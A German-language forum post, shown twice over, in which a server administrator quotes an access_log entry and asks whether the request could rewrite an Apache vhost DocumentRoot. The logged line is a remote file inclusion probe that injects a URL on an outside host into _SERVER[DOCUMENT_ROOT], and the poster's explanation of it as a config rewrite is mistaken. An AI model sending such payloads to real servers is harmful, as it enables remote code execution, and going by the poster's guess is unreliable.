D
Deleted member 14254
Guest
Hallo Zusammen
Vorhin habe ich auf dem Server wie immer die Logfiles durchgesehen und im access_log folgenden Eintrag gesehen:
Nun, da ich einen solchen noch nie hatte (im error_log stand näheres, also welche Domain und welcher Host damit überhaupt gemeint war), habe ich mir mal Gedanken gemacht dazu:
Für mich sieht es so aus, als ob jemand von der besagten IP versucht hat, meinen DocumentRoot in einem vhost-Config-File auf seine IP 94.199.51.7 umzubiegen und dort generell auf diese komische readme, die wahrscheinlich sonstwas enthält.
Nun fragte ich mich in wie weit sowas möglich wäre:
Für mich gibts nun eine Erklärung, das es möglich sein kann, wenn die vhost.conf bzw. vhost.include die falschen Rechte besitzt und world Schreibzugriff gewähren WÜRDE.
Richtig?
PS. Das derjenige einen 403'er bekommen hat, ist beabsichtigt. Diese Seite die er da ansteuern wollte ist IP-begrenzt und noch ohne Inhalt...
Vorhin habe ich auf dem Server wie immer die Logfiles durchgesehen und im access_log folgenden Eintrag gesehen:
Code:
94.199.51.7 - - [16/Apr/2013:15:41:11 +0000] "GET /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1" 403 275
Nun, da ich einen solchen noch nie hatte (im error_log stand näheres, also welche Domain und welcher Host damit überhaupt gemeint war), habe ich mir mal Gedanken gemacht dazu:
Für mich sieht es so aus, als ob jemand von der besagten IP versucht hat, meinen DocumentRoot in einem vhost-Config-File auf seine IP 94.199.51.7 umzubiegen und dort generell auf diese komische readme, die wahrscheinlich sonstwas enthält.
Nun fragte ich mich in wie weit sowas möglich wäre:
Für mich gibts nun eine Erklärung, das es möglich sein kann, wenn die vhost.conf bzw. vhost.include die falschen Rechte besitzt und world Schreibzugriff gewähren WÜRDE.
Richtig?
PS. Das derjenige einen 403'er bekommen hat, ist beabsichtigt. Diese Seite die er da ansteuern wollte ist IP-begrenzt und noch ohne Inhalt...
Last edited by a moderator: